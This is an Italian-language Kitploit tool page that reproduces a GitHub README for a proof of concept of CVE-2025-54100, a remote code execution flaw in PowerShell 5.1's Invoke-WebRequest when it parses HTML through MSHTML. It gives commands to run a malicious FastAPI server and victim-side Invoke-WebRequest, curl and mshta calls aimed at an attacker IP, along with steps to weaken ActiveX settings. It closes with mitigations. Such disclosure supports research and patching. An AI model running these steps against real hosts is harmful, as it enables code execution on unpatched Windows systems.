Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-54100 — CVE-2025-54100(Vulnerabilità di esecuzione remota di codice in PowerShell) | Kitploit
Strumenti/GitHubGitHub/xiaolvchen/cve-2025-54100
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubxiaolvchen/cve-2025-54100

CVE-2025-54100

CVE-2025-54100(Vulnerabilità di esecuzione remota di codice in PowerShell)

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-54100 – PoC di analisi della risposta PowerShell

Dimostrazione di come CVE-2025-54100 possa causare esecuzione remota di codice (RCE) in Windows PowerShell 5.1 tramite l'analisi di HTML malevolo.

Cos'è CVE-2025-54100?

Tipo di vulnerabilità: Rischio di injection di comandi quando Invoke-WebRequest non utilizza il parametro -UseBasicParsing

Gravità: CVSS 7.8 (Alto)

Causa principale: L'analisi della risposta HTML basata su MSHTML consente l'esecuzione di script (es. ActiveXObject) nel contesto del chiamante

Sistemi interessati:

  • Windows 10 / 11
  • Windows Server 2008–2025
  • PowerShell 5.1

Come funziona il PoC

  1. Il server FastAPI in CVE-2025-54100.py restituisce un payload HTML appositamente costruito
  2. Lo script nell'HTML tenta di istanziare oggetti ActiveX come WScript.Shell / Shell.Application
  3. Su un host vulnerabile, il parser MSHTML esegue lo script, dimostrando RCE tramite l'avvio di calc.exe
  4. Il payload fornito è minimo e non distruttivo, solo per ricerca e verifica, ma può essere esteso per ulteriori analisi

Avvio rapido

Requisiti

  • Python 3.10+ (testato con FastAPI e Uvicorn)
  • Installare le dipendenze
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

Esecuzione del server malevolo

Avvia il servizio HTTP del PoC:

root@kitploit:~
uvicorn app:app --host 0.0.0.0  --port 8888 --reload

Attivazione dall'host vittima

Su un host Windows vulnerabile, non utilizzare -UseBasicParsing, esegui i seguenti comandi:

root@kitploit:~
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.26.16:8888"
# curl (alias in PowerShell)
curl http://192.168.26.16:8888
# mshta
mshta http://192.168.26.16:8888

Assicurati che la porta corrisponda alla configurazione del server. Se il sistema è vulnerabile, lo script incorporato verrà eseguito dal parser MSHTML.

Nota: alcuni antivirus potrebbero bloccare questo comportamento, anche se la vulnerabilità di parsing è ancora presente.

Diagnostica e verifica

  1. Se calc.exe non appare:
    1. Apri Opzioni Internet sull'host vittima
    2. Vai su Sicurezza → Livello personalizzato
    3. Abilita “Inizializza e scripta i controlli ActiveX non contrassegnati come sicuri”
    4. Esegui nuovamente Invoke-WebRequest senza -UseBasicParsing

Questo passaggio serve per verificare il vettore di esecuzione. In scenari reali, un aggressore potrebbe usare offuscamento o tecniche di bypass per aggirare le restrizioni di sicurezza predefinite.

Prova di verifica

PoC

Mitigazioni

Microsoft ha risolto la vulnerabilità a dicembre 2025:

  1. Installa tempestivamente gli aggiornamenti di sicurezza di Windows

  2. Usa sempre -UseBasicParsing per evitare il parsing MSHTML:

    root@kitploit:~
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
    
  3. Migra a PowerShell 7+ (pwsh): PowerShell Core non dipende più da MSHTML per il parsing, eliminando architetturalmente il problema.

Riferimenti

  • NVD: CVE-2025-54100
  • MSRC: Update Guide
  • GitHub: osman1337-security/CVE-2025-54100
Scarica lo strumento